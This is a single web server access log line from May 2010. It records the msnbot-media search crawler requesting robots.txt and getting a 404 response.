207.46.194.96 - - [11/May/2010:18:37:55 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
